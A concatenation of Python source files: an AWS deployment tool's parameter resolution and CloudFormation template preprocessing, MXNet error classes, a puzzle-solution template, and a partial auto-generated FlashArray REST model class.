return string[: -len(pattern)] + sub if string.endswith(pattern) else string
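# Illustrative sketch (not part of the original module): anchored prefix and
# suffix replacement, shown with hypothetical job-name strings.
#
#   lreplace("feature_", "master_", "feature_myapp_bake")  # -> "master_myapp_bake"
#   rreplace("_bake", "_promote", "feature_myapp_bake")    # -> "feature_myapp_promote"
#   lreplace("other_", "master_", "feature_myapp_bake")    # -> unchanged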
def resolve_ami(component_params, component, image, imagebranch, branch, git):
if not git:
git = Git()
with git:
if "paramAmi" + image in os.environ:
return {
"ImageId": os.environ["paramAmi" + image],
"Name": os.environ["paramAmiName" + image]
if "paramAmiName" + image in os.environ
else "Unknown",
}
images = []
image_params = {}
job = ""
if "IMAGE_JOB" in os.environ and not image:
job = re.sub(r"\W", "_", os.environ["IMAGE_JOB"])
else:
image_params = load_parameters(
component=component, image=image, branch=imagebranch, git=git
)
if "JOB_NAME" in image_params:
job = re.sub(r"\W", "_", image_params["JOB_NAME"])
else:
prefix = ""
prefix = image_params["BUILD_JOB_PREFIX"]
job = prefix + "_" + component + "_bake"
if image:
job = job + "_" + image
job = re.sub(r"\W", "_", job)
build_param = "paramAmi" + image + "Build"
latest_baked = (
build_param in component_params
and component_params[build_param] == "latest"
)
if latest_baked:
# get current branch latest images
images = get_images(job)
if (
build_param in component_params
and component_params[build_param] != "latest"
):
# resolve with a specifically set image build number
build = component_params[build_param]
image_tag = job + "_" + build
job_tag_func = (
lambda image, image_name_prefix: len(
[tag for tag in image["Tags"] if tag["Value"] == image_tag]
)
> 0
)
images = get_images(job, job_tag_function=job_tag_func)
elif imagebranch != branch and not latest_baked:
# resolve promote job
suffix = "_bake"
repl_suffix = "_promote"
if image:
suffix += "_" + image
repl_suffix += "_" + image
if not image_params:
image_params = load_parameters(
component=component, image=image, branch=imagebranch, git=git
)
this_branch_prefix = re.sub(
r"\W", "_", component_params["BUILD_JOB_PREFIX"] + "_"
)
image_branch_prefix = re.sub(
r"\W", "_", image_params["BUILD_JOB_PREFIX"] + "_"
)
job = lreplace(image_branch_prefix, this_branch_prefix, job)
job = rreplace(suffix, repl_suffix, job)
images = get_images(job)
else:
# get current branch latest images
images = get_images(job)
if images:
return images[0]
else:
return None
def load_parameters(
component=None,
stack=None,
serverless=None,
docker=None,
image=None,
cdk=None,
terraform=None,
azure=None,
connect=None,
branch=None,
resolve_images=False,
git=None,
):
subc_type = ""
subc_name = ""
if stack:
subc_type = "stack"
subc_name = "stack=" + stack
if serverless:
subc_type = "serverless"
subc_name = "serverless=" + serverless
if docker:
subc_type = "docker"
subc_name = "docker=" + docker
if isinstance(image, six.string_types):
subc_type = "image"
subc_name = "image=" + image
if cdk:
subc_type = "cdk"
subc_name = "cdk=" + cdk
if terraform:
subc_type = "terraform"
subc_name = "terraform=" + terraform
if azure:
subc_type = "azure"
subc_name = "azure=" + azure
if connect:
subc_type = "connect"
subc_name = "connect=" + connect
if not git:
git = Git()
with git:
current_branch = git.get_current_branch()
if not branch:
branch = current_branch
branch = branch.strip().split("origin/")[-1:][0]
params_key = (component, subc_name, branch)
if params_key in parameters:
return parameters[params_key]
ret = {"GIT_BRANCH": branch}
account = resolve_account()
if account:
ret["ACCOUNT_ID"] = account
if component:
ret["COMPONENT"] = component
prefix = ""
if current_branch != branch:
prefix = git.export_branch(branch) + os.sep
files = [
prefix + "branch.properties",
prefix + branch + ".properties",
prefix + "infra.properties",
prefix + "infra-" + branch + ".properties",
]
if component:
files.append(prefix + component + os.sep + "infra.properties")
files.append(
prefix + component + os.sep + "infra-" + branch + ".properties"
)
_add_subcomponent_file(prefix + component, branch, "stack", stack, files)
_add_subcomponent_file(
prefix + component, branch, "serverless", serverless, files
)
_add_subcomponent_file(prefix + component, branch, "cdk", cdk, files)
_add_subcomponent_file(
prefix + component, branch, "terraform", terraform, files
)
_add_subcomponent_file(prefix + component, branch, "azure", azure, files)
_add_subcomponent_file(prefix + component, branch, "docker", docker, files)
_add_subcomponent_file(
prefix + component, branch, "connect", connect, files
)
_add_subcomponent_file(prefix + component, branch, "image", image, files)
if isinstance(image, six.string_types):
files.append(
prefix + component + os.sep + "image" + os.sep + "infra.properties"
)
files.append(
prefix
+ component
+ os.sep
+ "image"
+ os.sep
+ "infra-"
+ branch
+ ".properties"
)
initial_resolve = ret.copy()
os.environ["DO_NOT_RESOLVE_EXTERNAL_REFS"] = "true"
for file in files:
if os.path.exists(file):
import_parameter_file(file, initial_resolve)
del os.environ["DO_NOT_RESOLVE_EXTERNAL_REFS"]
if "REGION" not in initial_resolve:
ret["REGION"] = region()
else:
ret["REGION"] = initial_resolve["REGION"]
if not "AWS_DEFAULT_REGION" in os.environ:
os.environ["AWS_DEFAULT_REGION"] = ret["REGION"]
if "paramEnvId" not in initial_resolve:
ret["paramEnvId"] = branch
else:
ret["paramEnvId"] = initial_resolve["paramEnvId"]
for file in files:
if os.path.exists(file):
import_parameter_file(file, ret)
if (serverless or stack or cdk or terraform) and resolve_images:
image_branch = branch
if "BAKE_IMAGE_BRANCH" in ret:
image_branch = ret["BAKE_IMAGE_BRANCH"]
for docker in [
dockerdir.split("/docker-")[1]
for dockerdir in glob(component + os.sep + "docker-*")
]:
try:
ret["paramDockerUri" + docker] = resolve_docker_uri(
component, "paramDockerUri" + docker, image_branch, git
)
except ClientError:
                    # Best effort to load docker uris, but ignore errors since the repo might not
# actually be in use. Missing and used uris will result in an error later.
pass
for image_name in [
imagedir.split("/image")[1].replace("-", "").lower()
for imagedir in glob(component + os.sep + "image*")
]:
try:
image = resolve_ami(
ret, component, image_name, image_branch, branch, git
)
if image:
ret["paramAmi" + image_name] = image["ImageId"]
ret["paramAmiName" + image_name] = image["Name"]
env_param_name = "AMI_ID"
if image_name:
env_param_name += "_" + image_name.upper()
ret[env_param_name] = image["ImageId"]
except ClientError:
                    # Best effort to load ami info, but ignore errors since the image might not
# actually be in use. Missing and used images will result in an error later.
pass
if "REGION" not in ret:
ret["REGION"] = region()
if "paramEnvId" not in ret:
ret["paramEnvId"] = branch
if "ORIG_STACK_NAME" in os.environ:
ret["ORIG_STACK_NAME"] = os.environ["ORIG_STACK_NAME"]
if "STACK_NAME" not in ret:
ret["STACK_NAME"] = (
component + "-" + ret["ORIG_STACK_NAME"] + "-" + ret["paramEnvId"]
)
if docker and "NEEDS_DOCKER" not in ret:
ret["NEEDS_DOCKER"] = "y"
for k, v in list(os.environ.items()):
if k.startswith("ORIG_") and k.endswith("_NAME"):
ret[k] = v
if "ORIG_DOCKER_NAME" in os.environ:
if "DOCKER_NAME" not in ret:
ret["DOCKER_NAME"] = (
component + "/" + ret["paramEnvId"] + "-" + ret["ORIG_DOCKER_NAME"]
)
if "BUILD_JOB_PREFIX" not in ret:
if "JENKINS_JOB_PREFIX" in ret:
ret["BUILD_JOB_PREFIX"] = ret["JENKINS_JOB_PREFIX"]
else:
ret["BUILD_JOB_PREFIX"] = "ndt" + ret["paramEnvId"]
if "JENKINS_JOB_PREFIX" not in ret:
ret["JENKINS_JOB_PREFIX"] = ret["BUILD_JOB_PREFIX"]
if (
subc_type
and subc_type.upper() + "_NAME" not in ret
and "ORIG_" + subc_type.upper() + "_NAME" in ret
):
ret[subc_type.upper() + "_NAME"] = ret[
"ORIG_" + subc_type.upper() + "_NAME"
]
if subc_type == "azure":
if "AZURE_SCOPE" not in ret:
if "AZURE_SCOPE" in os.environ and os.environ["AZURE_SCOPE"]:
ret["AZURE_SCOPE"] = os.environ["AZURE_SCOPE"]
else:
ret["AZURE_SCOPE"] = "group"
if ret["AZURE_SCOPE"] == "group" and (
"AZURE_GROUP" not in ret or not ret["AZURE_GROUP"]
):
ret["AZURE_GROUP"] = (
ret["BUILD_JOB_PREFIX"] + "-" + component + "-" + azure
)
if ret["AZURE_SCOPE"] == "management-group" and (
"AZURE_MANAGEMENT_GROUP" not in ret or not ret["AZURE_MANAGEMENT_GROUP"]
):
ret["AZURE_MANAGEMENT_GROUP"] = (
ret["BUILD_JOB_PREFIX"] + "-" + component
)
parameters[params_key] = ret
return ret
def yaml_save(data):
class OrderedDumper(yaml.SafeDumper):
pass
def _dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, list(data.items())
)
OrderedDumper.add_representer(OrderedDict, _dict_representer)
return yaml.dump(data, None, OrderedDumper, default_flow_style=False)
def json_load(stream):
return json.loads(stream, object_pairs_hook=OrderedDict)
def json_save(data):
return json.dumps(data, indent=2, default=dthandler)
def json_save_small(data):
return json.dumps(data, indent=None, default=dthandler)
############################################################################
# import_scripts
gotImportErrors = False
def resolve_file(filename, basefile):
if filename[0] == "/":
return existing(filename)
if re.match(r"^(\.\./\.\./|\.\./|\./)?aws-utils/.*", filename):
return existing(
find_include(re.sub(r"^(\.\./\.\./|\.\./|\./)?aws-utils/", "", filename))
)
if re.match(r"^\(\(\s?includes\s?\)\)/.*", filename):
return existing(find_include(re.sub(r"^\(\(\s?includes\s?\)\)/", "", filename)))
base = os.path.dirname(basefile)
if len(base) == 0:
base = "."
return existing(base + "/" + filename)
def existing(filename):
if filename and os.path.exists(filename):
return filename
else:
return None
PARAM_NOT_AVAILABLE = ParamNotAvailable()
def _add_params(target, source, source_prop, use_value):
if source_prop in source:
if isinstance(source[source_prop], OrderedDict) or isinstance(
source[source_prop], dict
):
for k, val in list(source[source_prop].items()):
target[k] = (
val["Default"]
if use_value and "Default" in val
else PARAM_NOT_AVAILABLE
)
elif isinstance(source[source_prop], list):
for list_item in source[source_prop]:
for k, val in list(list_item.items()):
target[k] = (
val["Default"]
if use_value and "Default" in val
else PARAM_NOT_AVAILABLE
)
def _get_params(data, template):
params = OrderedDict()
# first load defaults for all parameters in "Parameters"
if "Parameters" in data:
_add_params(params, data, "Parameters", True)
if (
"Fn::Merge" in data["Parameters"]
and "Result" in data["Parameters"]["Fn::Merge"]
):
_add_params(params, data["Parameters"]["Fn::Merge"], "Result", True)
if (
"Fn::ImportYaml" in data["Parameters"]
and "Result" in data["Parameters"]["Fn::ImportYaml"]
):
_add_params(params, data["Parameters"]["Fn::ImportYaml"], "Result", True)
if "resources" in data and "Parameters" in data["resources"]:
params["ServerlessDeploymentBucket"] = PARAM_NOT_AVAILABLE
_add_params(params, data["resources"], "Parameters", True)
if (
"Fn::Merge" in data["resources"]["Parameters"]
and "Result" in data["resources"]["Parameters"]["Fn::Merge"]
):
_add_params(
params, data["resources"]["Parameters"]["Fn::Merge"], "Result", True
)
if (
"Fn::ImportYaml" in data["resources"]["Parameters"]
and "Result" in data["resources"]["Parameters"]["Fn::ImportYaml"]
):
_add_params(
params,
data["resources"]["Parameters"]["Fn::ImportYaml"],
"Result",
True,
)
params["STACK_NAME"] = PARAM_NOT_AVAILABLE
if "REGION" not in os.environ:
os.environ["REGION"] = region()
params["REGION"] = os.environ["REGION"]
if "ACCOUNT_ID" not in os.environ:
if resolve_account():
os.environ["ACCOUNT_ID"] = resolve_account()
else:
os.environ["ACCOUNT_ID"] = "None"
params["ACCOUNT_ID"] = os.environ["ACCOUNT_ID"]
global SOURCED_PARAMS
if not SOURCED_PARAMS:
SOURCED_PARAMS = {}
# then override them with values from infra
template_dir = os.path.dirname(os.path.abspath(template))
image_dir = os.path.dirname(template_dir)
image_name = os.path.basename(image_dir)
stack_name = os.path.basename(template_dir)
stack_name = re.sub("^stack-", "", stack_name)
SOURCED_PARAMS = load_parameters(component=image_name, stack=stack_name)
SOURCED_PARAMS.update(os.environ)
params.update(SOURCED_PARAMS)
# source_infra_properties.sh always resolves a region, account id and stack
# name
params["AWS::Region"] = params["REGION"]
params["AWS::AccountId"] = params["ACCOUNT_ID"]
params["AWS::StackName"] = params["STACK_NAME"]
# finally load AWS-provided and "Resources"
params["AWS::NotificationARNs"] = PARAM_NOT_AVAILABLE
params["AWS::NoValue"] = PARAM_NOT_AVAILABLE
params["AWS::StackId"] = PARAM_NOT_AVAILABLE
_add_params(params, data, "Resources", False)
if "resources" in data:
_add_params(params, data["resources"], "Resources", False)
return params
# Recursively tags "Ref" expressions (e.g. in inline script content) with their source file and optional/default info
def apply_source(data, filename, optional, default):
if isinstance(data, OrderedDict):
if "Ref" in data:
data["__source"] = filename
if optional == "#optional":
data["__optional"] = "true"
data["__default"] = default
for k, val in list(data.items()):
apply_source(k, filename, optional, default)
apply_source(val, filename, optional, default)
# returns new data
def _preprocess_template(data, root, basefile, path, templateParams):
param_refresh_callback = lambda: templateParams.update(_get_params(root, basefile))
param_refresh_callback()
global gotImportErrors
if isinstance(data, OrderedDict):
if "Fn::ImportFile" in data:
val = data["Fn::ImportFile"]
file = expand_vars(val, templateParams, None, [])
script_import = resolve_file(file, basefile)
if script_import:
params = OrderedDict(list(templateParams.items()))
params.update(data)
data.clear()
contents = expand_only_double_paranthesis_params(
import_script(script_import), params, None, []
)
data["Fn::Join"] = ["", contents]
else:
print(
"ERROR: "
+ val
+ ": Can't import file \""
+ val
+ '" - file not found on include paths or relative to '
+ basefile
)
gotImportErrors = True
elif "Fn::ImportYaml" in data:
val = data["Fn::ImportYaml"]
jmespath = None
if "jmespath" in data and data["jmespath"]:
jmespath = data["jmespath"]
file = expand_vars(val, templateParams, None, [])
yaml_file = resolve_file(file, basefile)
del data["Fn::ImportYaml"]
if yaml_file:
contents = yaml_load(open(yaml_file))
params = OrderedDict(list(templateParams.items()))
params.update(data)
contents = expand_vars(contents, params, None, [])
data["Fn::ImportYaml"] = OrderedDict()
data["Fn::ImportYaml"]["Result"] = contents
param_refresh_callback()
while True:
expanded_result = expand_vars(contents, templateParams, None, [])
if expanded_result == contents:
break
else:
contents.clear()
contents.update(expanded_result)
param_refresh_callback()
data.clear()
if isinstance(contents, OrderedDict):
for k, val in list(contents.items()):
data[k] = _preprocess_template(
val, root, yaml_file, path + k + "_", templateParams
)
elif isinstance(contents, list):
data = contents
for i in range(0, len(data)):
data[i] = _preprocess_template(
data[i],
root,
yaml_file,
path + str(i) + "_",
templateParams,
)
else:
print(
"ERROR: "
+ path
+ ": Can't import yaml file \""
+ yaml_file
+ "\" that isn't an associative array or"
+ " a list in file "
+ basefile
)
gotImportErrors = True
if jmespath:
data = search(jmespath, data)
else:
if not ("optional" in data and data["optional"]):
print(
"ERROR: "
+ val
+ ": Can't import file \""
+ val
+ '" - file not found on include paths or relative to '
+ basefile
)
gotImportErrors = True
else:
for k in list(data):
del data[k]
if data and "optional" in data:
del data["optional"]
data = _preprocess_template(data, root, yaml_file, path, templateParams)
elif "Fn::Merge" in data:
merge_list = (
data["Fn::Merge"]["Source"]
if "Source" in data["Fn::Merge"]
else data["Fn::Merge"]
)
result = (
data["Fn::Merge"]["Result"]
if "Result" in data["Fn::Merge"]
else OrderedDict()
)
data["Fn::Merge"] = OrderedDict(
[("Source", merge_list), ("Result", result)]
)
if not isinstance(merge_list, list):
print(
"ERROR: "
+ path
+ ": Fn::Merge must associate to a list in file "
+ basefile
)
gotImportErrors = True
return data
merge = _preprocess_template(
expand_vars(merge_list.pop(0), templateParams, None, []),
root,
basefile,
path + "/",
templateParams,
)
if not result:
result = merge
data["Fn::Merge"] = OrderedDict(
[("Source", merge_list), ("Result", result)]
)
elif not isinstance(merge, type(result)):
print(
"ERROR: "
+ path
+ ": First Fn::Merge entries "
+ "were of type "
+ str(type(result))
+ ", but the following entry was not: \n"
+ json.dumps(merge, indent=2)
+ "\nIn file "
+ basefile
)
gotImportErrors = True
elif isinstance(merge, OrderedDict):
result.update(merge)
elif isinstance(merge, list):
result.extend(merge)
else:
print("ERROR: " + path + ": Unsupported " + str(type(merge)))
gotImportErrors = True
param_refresh_callback()
while True:
expanded_result = expand_vars(result, templateParams, None, [])
if expanded_result == result:
break
else:
result.clear()
result.update(expanded_result)
param_refresh_callback()
if not merge_list:
del data["Fn::Merge"]
return result
else:
return _preprocess_template(
data, root, basefile, path + "/", templateParams
)
elif "StackRef" in data:
stack_var = expand_vars(data["StackRef"], templateParams, None, [])
stack_var = _check_refs(
stack_var, basefile, path + "StackRef_", templateParams, True
)
data.clear()
stack_value = _resolve_stackref_from_dict(stack_var)
if not stack_value:
raise StackRefUnresolved(
"Did not find value for: "
+ stack_var["paramName"]
+ " in stack "
+ stack_var["region"]
+ "."
+ stack_var["stackName"]
)
param_refresh_callback()
return stack_value
elif "TFRef" in data:
tf_var = expand_vars(data["TFRef"], templateParams, None, [])
tf_var = _check_refs(
tf_var, basefile, path + "TFRef_", templateParams, True
)
data.clear()
tf_value = _resolve_tfref_from_dict(tf_var)
if not tf_value:
ref = (
stack_var["paramName"]
if "paramName" in stack_var
else stack_var["jmespath"]
)
raise TFRefUnresolved(
"Did not find value for: "
+ ref
+ " in terraform compnent "
+ stack_var["component"]
+ "."
+ stack_var["terraform"]
)
param_refresh_callback()
return tf_value
elif "Encrypt" in data and "value" in data["Encrypt"]:
to_encrypt = data["Encrypt"]["value"]
enc_conf = data["Encrypt"]
del enc_conf["value"]
vault = Vault(**enc_conf)
resolved_value = _preprocess_template(
to_encrypt, root, basefile, path + "Encrypt_", templateParams
)
if not isinstance(resolved_value, six.string_types):
raise EncryptException("Encrypted value needs to be a string")
return b64encode(vault.direct_encrypt(resolved_value))
elif "Ref" in data:
data["__source"] = basefile
elif "VaultRef" in data:
vault_key = expand_vars(data["VaultRef"], templateParams, None, [])
return _resolve_vault_parameter(vault_key)
elif "SsmRef" in data:
ssm_key = expand_vars(data["SsmRef"], templateParams, None, [])
return _resolve_ssm_parameter(ssm_key)
elif "ProductAmi" in data:
product_code = expand_vars(data["ProductAmi"], templateParams, None, [])
return _resolve_product_ami(product_code)
elif "OwnerNamedAmi" in data:
owner_named = expand_vars(data["OwnerNamedAmi"], templateParams, None, [])
if "owner" in owner_named and "name" in owner_named:
return _resolve_onwer_named_ami(
owner_named["owner"], owner_named["name"]
)
elif "FlowRef" in data:
flow_name = expand_vars(data["FlowRef"], templateParams, None, [])
if flow_name:
return _resolve_flowref(flow_name)
else:
if "Parameters" in data:
data["Parameters"] = _preprocess_template(
data["Parameters"],
root,
basefile,
path + "Parameters_",
templateParams,
)
param_refresh_callback()
for k, val in list(data.items()):
if k != "Parameters":
data[k] = expand_vars(
_preprocess_template(
val, root, basefile, path + _to_str(k) + "_", templateParams
),
templateParams,
None,
[],
)
elif isinstance(data, list):
for i in range(0, len(data)):
data[i] = _preprocess_template(
data[i], root, basefile, path + str(i) + "_", templateParams
)
return data
# returns new data
def _check_refs(data, templateFile, path, templateParams, resolveRefs):
global gotImportErrors
if isinstance(data, OrderedDict):
if "Ref" in data:
var_name = data["Ref"]
if "__source" in data:
filename = data["__source"]
del data["__source"]
else:
filename = "unknown"
if "__source_line" in data:
file_line = data["__source_line"]
del data["__source_line"]
else:
file_line = 0
# Ignore serverless framework default rest api resource that is secretly created by the framework
if var_name not in templateParams and var_name != "ApiGatewayRestApi":
if "__optional" in data:
data = data["__default"]
else:
print(
"ERROR: "
+ path
+ ': Referenced parameter "'
+ var_name
+ '" in file '
+ filename
+ ":"
+ str(file_line)
+ " not declared in template parameters in "
+ templateFile
)
gotImportErrors = True
else:
if resolveRefs:
data = templateParams[var_name]
if data == PARAM_NOT_AVAILABLE:
print(
"ERROR: "
+ path
+ ': Referenced parameter "'
+ var_name
+ '" in file '
+ filename
+ " is resolved later by AWS; cannot resolve its"
+ " value now"
)
gotImportErrors = True
if "__optional" in data:
del data["__optional"]
if "__default" in data:
del data["__default"]
else:
for k, val in list(data.items()):
data[k] = _check_refs(
val, templateFile, path + k + "_", templateParams, resolveRefs
)
elif isinstance(data, list):
for i in range(0, len(data)):
data[i] = _check_refs(
data[i], templateFile, path + str(i) + "_", templateParams, resolveRefs
)
return data
def import_scripts(data, basefile, extra_parameters={}):
global gotImportErrors
gotImportErrors = False
params = _get_params(data, basefile)
params.update(extra_parameters)
data = expand_vars(data, params, None, [])
params = _get_params(data, basefile)
params.update(extra_parameters)
data = _preprocess_template(data, data, basefile, "", params)
params = _get_params(data, basefile)
params.update(extra_parameters)
data = _check_refs(data, basefile, "", params, False)
if gotImportErrors:
sys.exit(1)
return data
############################################################################
# extract_scripts
def bash_encode_parameter_name(name):
return "CF_" + re.sub("::", "__", name)
def encode_script_filename(prefix, path):
if path.find("UserData_Fn::Base64") != -1:
return prefix + "-userdata.sh"
idx = path.find(CFG_PREFIX)
if idx != -1:
soff = idx + len(CFG_PREFIX)
eoff = path.find("_content_", soff)
cfg_path = path[soff:eoff]
return prefix + "-" + cfg_path[cfg_path.rfind("/") + 1 :]
return prefix + "-" + path
def extract_script(prefix, path, join_args):
# print prefix, path
# "before" and "after" code blocks, placed before and after var declarations
code = ["", ""]
var_decls = OrderedDict()
code_idx = 0
for element in join_args:
if isinstance(element, OrderedDict):
if "Ref" not in element:
print("Dict with no ref")
json_save(element)
else:
var_name = element["Ref"]
if not len(var_name) > 0:
raise Exception(
"Failed to convert reference inside "
+ "script: "
+ str(element)
)
bash_varname = bash_encode_parameter_name(var_name)
var_decl = ""
# var_decl += "#" + var_name + "\n"
var_decl += bash_varname + '="";\n'
var_decls[var_name] = var_decl
code[code_idx] += "${" + bash_varname + "}"
else:
code[code_idx] += element
code_idx = 1 # switch to "after" block
filename = encode_script_filename(prefix, path)
sys.stderr.write(
prefix + ": Exported path '" + path + "' contents to file '" + filename + "'\n"
)
    with open(filename, "w") as script_file:  # write the extracted script out
script_file.write(code[0])
script_file.write("\n")
for var_name, var_decl in list(var_decls.items()):
script_file.write(var_decl)
script_file.write("\n")
script_file.write(code[1])
return filename
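# Illustrative sketch of what the extraction above produces (the Fn::Join below
# is a hypothetical example, not taken from a real template):
#     ["", ["#!/bin/bash\n", "echo ", {"Ref": "AWS::StackName"}, "\n"]]
# becomes a script whose header declares CF_AWS__StackName="" and whose body
# references ${CF_AWS__StackName} in place of the Ref.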
# data argument is mutated
def extract_scripts(data, prefix, path=""):
if not isinstance(data, OrderedDict):
return
for k, val in list(data.items()):
extract_scripts(val, prefix, path + k + "_")
if k == "Fn::Join":
if not val[0] == "":
continue
if isinstance(val[1][0], six.string_types) and (val[1][0].find("#!") != 0):
continue
script_file = extract_script(prefix, path, val[1])
del data[k]
data["Fn::ImportFile"] = script_file
############################################################################
# simple apis
def yaml_to_dict(yaml_file_to_convert, merge=[], extra_parameters={}):
data = OrderedDict()
with open(yaml_file_to_convert) as yaml_file:
data = yaml_load(yaml_file)
if "connectInstanceId" in data:
global CONNECT_INSTANCE_ID
CONNECT_INSTANCE_ID = expand_vars(data["connectInstanceId"], {}, None, [])
if merge:
for i in range(0, len(merge)):
with open(merge[i]) as yaml_file:
merge[i] = yaml_load(yaml_file)
merge.append(data)
merge_data = OrderedDict()
merge_data["Fn::Merge"] = merge
data = merge_data
data = import_scripts(data, yaml_file_to_convert, extra_parameters=extra_parameters)
_patch_launchconf(data)
return data
def yaml_to_json(yaml_file_to_convert, merge=[]):
data = yaml_to_dict(yaml_file_to_convert, merge)
return json_save(data)
def yaml_to_yaml(yaml_file_to_convert):
data = yaml_to_dict(yaml_file_to_convert)
return yaml_save(data)
def json_to_yaml(json_file_to_convert):
data = json_load(open(json_file_to_convert).read())
extract_scripts(data, json_file_to_convert)
return yaml_save(data)
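# Minimal usage sketch of the simple apis above; the file names are
# illustrative assumptions:
#
#     data = yaml_to_dict("infra-template.yaml", merge=["common.yaml"])
#     print(json_save(data))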
############################################################################
# misc json
def locate_launchconf_metadata(data):
if "Resources" in data:
resources = data["Resources"]
for val in list(resources.values()):
if (
val
and "Type" in val
and val["Type"] == "AWS::AutoScaling::LaunchConfiguration"
and "Metadata" in val
):
return val["Metadata"]
return None
def locate_launchconf_userdata(data):
resources = data["Resources"]
for val in list(resources.values()):
if "Type" in val and val["Type"] == "AWS::AutoScaling::LaunchConfiguration":
if (
"Properties" in val
and "UserData" in val["Properties"]
and "Fn::Base64" in val["Properties"]["UserData"]
and "Fn::Join" in val["Properties"]["UserData"]["Fn::Base64"]
and len(val["Properties"]["UserData"]["Fn::Base64"]["Fn::Join"]) >= 2
):
return val["Properties"]["UserData"]["Fn::Base64"]["Fn::Join"][1]
else:
if (
"Properties" in val
and "UserData" in val["Properties"]
and "Fn::Base64" in val["Properties"]["UserData"]
and "Fn::Sub" in val["Properties"]["UserData"]["Fn::Base64"]
):
return val["Properties"]["UserData"]["Fn::Base64"]["Fn::Sub"]
return None
def reset_launchconf_userdata(data, lc_userdata):
resources = data["Resources"]
for val in list(resources.values()):
if "Type" in val and val["Type"] == "AWS::AutoScaling::LaunchConfiguration":
val["Properties"]["UserData"]["Fn::Base64"]["Fn::Sub"] = lc_userdata
def get_refs(data, reflist=None):
if not reflist:
reflist = []
if isinstance(data, OrderedDict):
if "Ref" in data:
reflist.append(data["Ref"])
for val in list(data.values()):
get_refs(val, reflist)
elif isinstance(data, list):
for ref in data:
get_refs(ref, reflist)
return reflist
def _patch_launchconf(data):
lc_meta = locate_launchconf_metadata(data)
if lc_meta is not None:
lc_userdata = locate_launchconf_userdata(data)
if lc_userdata:
if isinstance(lc_userdata, list):
lc_userdata.append(
"\nexit 0\n# metadata hash: " + str(hash(json_save(lc_meta))) + "\n"
)
else:
lc_userdata += (
"\nexit 0\n# metadata hash: " + str(hash(json_save(lc_meta))) + "\n"
)
reset_launchconf_userdata(data, lc_userdata)
lc_meta_refs = set(get_refs(lc_meta))
            # Only list-form (Fn::Join) user data can carry Ref markers
            if len(lc_meta_refs) > 0 and isinstance(lc_userdata, list):
first = 1
for ref in lc_meta_refs:
lc_userdata.append("# metadata params: " if first else ", ")
lc_userdata.append({"Ref": ref})
first = 0
lc_userdata.append("\n")
class StackRefUnresolved(Exception):
pass
class TFRefUnresolved(Exception):
pass
class EncryptException(Exception):
pass
|
py | b4110809c95aed5e3984418a07619846dab610e0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Structured error classes in MXNet.
Each error class takes an error message as its input.
See the example sections for suggested message conventions.
To make the code more readable, we recommend that developers
copy the examples and raise errors with the same message convention.
"""
from .base import MXNetError, register_error
__all__ = ['MXNetError', 'register']
register = register_error
@register_error
class InternalError(MXNetError):
"""Internal error in the system.
Examples
--------
.. code :: c++
// Example code C++
LOG(FATAL) << "InternalError: internal error detail.";
.. code :: python
# Example code in python
raise InternalError("internal error detail")
"""
def __init__(self, msg):
# Patch up additional hint message.
if "MXNet hint:" not in msg:
msg += ("\nMXNet hint: You hit an internal error. Please open an issue in "
"https://github.com/apache/incubator-mxnet/issues/new/choose"
" to report it.")
super(InternalError, self).__init__(msg)
register_error("ValueError", ValueError)
register_error("TypeError", TypeError)
register_error("AttributeError", AttributeError)
register_error("IndexError", IndexError)
register_error("NotImplementedError", NotImplementedError)
|
py | b41108941268bb94b46cfe540ae9ba2ff729ed01 | RUN_TEST = True
TEST_SOLUTION = ...
TEST_INPUT_FILE = 'test_input_day_XX.txt'
INPUT_FILE = 'input_day_XX.txt'
ARGS = []
def main_part1(input_file, ):
with open(input_file) as file:
lines = list(map(lambda line: line.rstrip(), file.readlines()))
...
solution = ...
return solution
if __name__ == '__main__':
if RUN_TEST:
solution = main_part1(TEST_INPUT_FILE, *ARGS)
print(solution)
assert (TEST_SOLUTION == solution)
else:
solution = main_part1(INPUT_FILE, *ARGS)
print(solution)
|
py | b41109389b0475386ac77cc4261043485424e85f | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_2 import models
class ReplicaLinkPerformanceReplication(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bytes_per_sec_from_remote': 'int',
'bytes_per_sec_to_remote': 'int',
'bytes_per_sec_total': 'int',
'direction': 'str',
'local_pod': 'FixedReference',
'remote_pod': 'FixedReference',
'remotes': 'list[FixedReference]',
'time': 'int'
}
attribute_map = {
'bytes_per_sec_from_remote': 'bytes_per_sec_from_remote',
'bytes_per_sec_to_remote': 'bytes_per_sec_to_remote',
'bytes_per_sec_total': 'bytes_per_sec_total',
'direction': 'direction',
'local_pod': 'local_pod',
'remote_pod': 'remote_pod',
'remotes': 'remotes',
'time': 'time'
}
required_args = {
}
def __init__(
self,
bytes_per_sec_from_remote=None, # type: int
bytes_per_sec_to_remote=None, # type: int
bytes_per_sec_total=None, # type: int
direction=None, # type: str
local_pod=None, # type: models.FixedReference
remote_pod=None, # type: models.FixedReference
remotes=None, # type: List[models.FixedReference]
time=None, # type: int
):
"""
Keyword args:
bytes_per_sec_from_remote (int): The number of bytes received per second from a remote array.
bytes_per_sec_to_remote (int): The number of bytes transmitted per second to a remote array.
bytes_per_sec_total (int): Total bytes transmitted and received per second.
direction (str): The direction of replication. Valid values are `inbound` and `outbound`.
local_pod (FixedReference): Reference to a local pod.
remote_pod (FixedReference): Reference to a remote pod.
remotes (list[FixedReference]): Reference to a remote array.
time (int): Sample time in milliseconds since the UNIX epoch.
"""
if bytes_per_sec_from_remote is not None:
self.bytes_per_sec_from_remote = bytes_per_sec_from_remote
if bytes_per_sec_to_remote is not None:
self.bytes_per_sec_to_remote = bytes_per_sec_to_remote
